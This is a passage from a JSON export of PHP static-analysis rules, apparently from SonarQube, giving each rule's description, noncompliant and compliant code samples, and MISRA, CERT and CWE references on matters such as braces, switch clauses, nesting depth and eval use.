Foo is coupled to T1\n \/**\n * @var T2\n *\/\n protected $a2; \/\/ Foo is coupled to T2\n \/**\n * @var T3\n *\/\n private $a3; \/\/ Foo is coupled to T3\n\n \/**\n * @param T5\n * @param T6\n *\n * @return T4\n *\/\n public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n $result = new T7(); \/\/ Foo is coupled to T7\n return $result;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n executeSomething();\n checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n executeSomething();\n checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v > 2; }; \/\/ Compliant\n$max_comparator = function ($v) { echo $v; return $v > 2; }; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n} else {\n throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n <li> When the stop condition depend upon a method call <\/li>\n <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n if(condition) {\n $i = 20;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n}\n\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n loop. <\/li>\n <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2: \/\/ Both 'doSomething()' and 'doSomethingElse()' will be executed. Is it on purpose ?\n do_something();\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n case 0: \/\/ Empty case used to specify the same behavior for a group of cases.\n case 1:\n do_something();\n break;\n case 2: \/\/ Use of continue statement\n continue;\n case 3: \/\/ Case includes a jump statement (exit, return, break &etc)\n exit(0);\n case 4:\n echo 'Second case, which falls through';\n \/\/ no break <- comment is used when fall-through is intentional in a non-empty case body\n default: \/\/ For the last case, use of break statement is optional\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n case 0:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n do_something();\n} else {\n do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) { \/\/missing default clause\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n\nswitch ($param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n ...\n if (condition2) { \/\/ Compliant - depth = 2\n ...\n for($ = 0; $i < 10; $i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n ...\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n ...\n }\n return;\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n $seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n $duration = ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000 ;\n return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n return ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. <\/p>\n<p>According to the PHP documentation<\/p>\n<blockquote>\n <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have\n carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror prone. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar'; \/\/Noncompliant\n$$$var = 'hello'; \/\/Noncompliant\n\necho $foo; \/\/will display 'bar'\necho $bar; \/\/will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables are deprecated and should be replaced by the new versions:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Replace<\/th>\n <th>With<\/th>\n <\/tr>\n <tr>\n <td>$HTTP_SERVER_VARS<\/td>\n <td>$_SERVER<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_GET_VARS<\/td>\n <td>$_GET<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_VARS<\/td>\n <td>$_POST<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_FILES<\/td>\n <td>$_FILES<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_SESSION_VARS<\/td>\n <td>$_SESSION<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_ENV_VARS<\/td>\n <td>$_ENV<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_COOKIE_VARS<\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and\nthe \"__construct\" method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named \"__construct\"\nas the class constructor. <\/p>\n<p>This rule rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n function Foo(){...}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n function __construct(){...}\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to make a call to a parent constructor have evolved. When declaring constructors with\nthe PHP5 <code>__construct<\/code> name, nested calls to parent constructors should also use the new <code>__constructor<\/code> name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::Bar();\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::__construct();\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n $this->name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code><?php\n?><\/code> tags or the short-echo <code><?= ?><\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?\n$foo = 1;\n?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n$foo = 1;\n?>\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n $i++; \/\/ this is never executed\n}\n\nfunction foo($a) {\n if ($a == 5) {\n goto error;\n } else {\n \/\/ do the job\n }\n return;\n\n error:\n printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n}\n\nfunction foo($a) {\n if ($a == 5) {\n handleError();\n } else {\n \/\/ do the job\n }\n return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n doZ();\n}\nif ( $a != $a ) { \/\/ always false\n doY();\n}\nif ( $a == $b && $a == $b ) { \/\/ if the first one is true, the second one is too\n doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 << 1; \/\/ Compliant\n$j = $a << $a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar1 = 1;\n private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. Moreover\nsome SCM engines like Git might sometimes badly support use of Windows 'CRLF' end of line characters.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The closing <code>?><\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants 